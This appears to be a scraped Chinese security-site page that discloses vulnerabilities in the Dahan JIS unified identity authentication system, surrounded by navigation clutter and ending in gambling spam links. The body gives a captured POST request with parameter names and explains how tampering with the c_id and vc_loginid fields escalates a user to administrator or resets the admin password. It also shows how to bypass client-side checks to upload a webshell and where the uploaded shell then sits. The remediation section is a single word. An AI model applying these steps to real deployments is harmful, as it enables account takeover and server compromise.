大汉通版jis统一身份认证系统漏洞打包

时间:2017/11/22来源:sabfilmyhai.com
大汉通版jis统一身份认证系统漏洞打包_网站安全_网管之家 首页| 群组 | 焦点 专题 | 网管视频▣ oracle新闻 cisco新闻 linux新闻 windows solaris unix/bsd windows7 bios/cmos linux编程 cisco技术 网络设备.技术 存储设备.技术 其它开发/数据库 网页设计» 平面设计» 站长之家» 机房建设» it认证» 多媒体» 工具软件» 通讯软件» qq头像» qq皮肤» 空间素材» bitscn.com > > > 大 中 小] 评论: 大汉通版jis统一身份认证系统: 在用户修改信息时进行抓包发现 post: http://10.11.5.201:9080/jis/front/upduser_do.jsp content: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname=  经过验证c_id为权限控制字段,00000为管理员,vc_loginid为登陆名称,vc_password以及 vc_pwd为密码, (1)用户权限提升: 在修改个人信息时进行抓包,将c_id修改成0000,即可提升为系统管理员, (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 (3)任意文件上传漏洞  上传地址:http://url//jis/update/update.jsp  去掉本地js验证 shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名 修复方案:控制 顶一下(0) 踩一下(0) 上一篇:java反射执行系统命令 下一篇:netcms存在存储形xss 挑错 推荐 打印 相关文章 汇成企业网站管理系统v1.0 cookie 注入漏洞及修复极瑞企业网站系统v1.0 cookie 注入漏洞及修复杰奇小说连载系统任意文件上传漏洞及修复老y文章管理系统默认数据库漏洞及修复翎动物流公司网站系统fck漏洞及修复jamanage企业建站系统v2.0 注入漏洞及修复冠龙科技企业网站管理系统v9.2cookies注入漏洞及修bossi公司(企业)网站管理系统惊现多种漏洞及修复自助建站系统0day拿shellhishop 5.4&5.4.1 网店系统 sql 注入漏洞及修复 猜你喜欢 no.001中学网站管理系统 build 110628 注入漏洞及修网奇cwms企业网站管理系统3.0编辑器漏洞及修复测试xss如何获得目标机器系统权限凡人网络购物系统v8.0 简体中文版cookie欺骗漏洞及樱桃企业网站管理系统v1.1 注入漏洞及修复网站管理系统0day及修复卓讯智能化网站管理系统emteeasysite漏洞及修复ec_word企业管理系统注入漏洞及修复深喉cms系统一个垃圾命令执行缺陷及修复华商网投票系统设计缺陷及详细修复方案 网友评论 最新图文 1 2 3 4 5 自己手机上的二维码信息如何获取? 手机换号了微信怎么取消手机绑定? 微信好友测试是什么怎么弄?微信好 微信群发好友测试 微信群发是测试 淘宝店如何开到微信上 手把手教你 微信怎么取消好友和对公众账号的关 微信通讯录备份在云端怎样管理? web开发中的基本概念和用到的技术 纯css写的评分鼠标移入的效果附图 微信朋友圈营销之无广告推广技巧 手机qq翻盘微信 哪五个方向着手? 微信怎么设置不发好友验证,别人就 微信5.0免费表情添加方法 大师的世界永远难懂,细看微信营销 html5文字阴影效果text-shadow使用 html5记忆翻牌游戏实现思路及代码 html5 乒乓球(碰撞检测)实例二 html5 迷宫游戏(碰撞检测)实例一 它真的神了!为什么“神经猫”在微 神经猫根本停不下来!到底是什么引 一款面膜是如何做到微信营销年销售 黄若朋友圈卖牛肉反思:亲历微信“ 博洋公众微信平台营销:企业如何成 实现div垂直居中的display:table-c 一边听歌一边摇《中国好声音》互动 群众围观 关于php包含apache日志的随想fckeditor编辑器在apache下又一思路j2ee mvc模式框架中,表单数据绑定功能不安全实现在tom一些绕过waf的笔记apache安全设置正方教务管理系统设计错误,可绕过验证码进行暴破或扫强智科技教务管理系统注入漏洞及修复盛大在线游戏茶苑存在注射及修复方案dedecms v5.5 漏洞那些年我们一起学xss - 4. 宽字节复仇记 [qq邮箱基本 热门标签: webshell(425) z-blog(12) 推荐文章 华为内部的web安全原则wordpress xml-rpc pingback 漏洞分析防止.net木马列所有站物理路径,aspxspgitbucket1.8版本 关于readme.md的xssecshop漏洞分析常用安全测试用例xss盗cookie实战我是这样挖掘x-forwarded-for注入到成百度云rom论坛存储型xss一枚高版本正方教务系统上传后缀过滤不严致 本类热门 本类人气 关于java网站建设之网站安全性新浪微博cookies盗取[flash编程安全+apphp包含apache日志获得shell方法详解php环境安全配置给root和apache降权处tomcat服务器手动判断目录是否存在javascript常见安全漏洞及自动检测技术用java数字签名提供xml安全apache禁止trace或track防止xss攻击php apache_lookup_uri函数bug分析struts2 tomcat class.classloader.res 撞库攻击:一场需要用户参与的持久攻防快播子站(举报不良内容)存在sql注入和如何防止apache+php环境下虚拟主机被旁linux下apache与php安全相关设置tomcat后台利用技巧apache反向代理也谈apache,nginx上传目录无执行权限apache ofbiz sql remote execution poapache activemq url请求源码泄露漏洞apache activemq跨站脚本和跨站请求伪 频道热门 频道人气 3d max 菜单中英文对照表轻松用nero7.0刻录自己的影碟powerpoint实例教程:制作生日贺卡outlook express使用技巧大全(下)nero使用说明如何使用火狐插件下载youtube视频教您用foxmail来收发gmail邮件photoshop仿手绘教程:照片转手绘详细用透明flash装扮好qq空间如何将excel表格导入到coreldraw中 outlook express使用技巧大全(上)刻录光盘不求人nero刻录软件使用教程如何撤回与取消你发错的邮件在microsft outlook中修复ost 或pst 文nero 6高级使用图解整理推荐三十五个非常强大的ui设计教程oe出现0x800c0133错误的解决方案photoshop为照片添加文字 增强艺术效果3d max动画实例制作飘扬的党旗nero刻录实用教程 copyright ©2014 版权所有 沪icp证08026629号 - - - -

文章地址:http://sabfilmyhai.com/sow/w1/bitscn/c1/webanquan/201401/267596.html
六合彩预测 澳门新葡京手机版 澳门葡京网址是什么 伯爵赌场官网 澳门百家乐公正吗 pt平台 赌球让球规则 澳门368娱乐网 战神娱乐场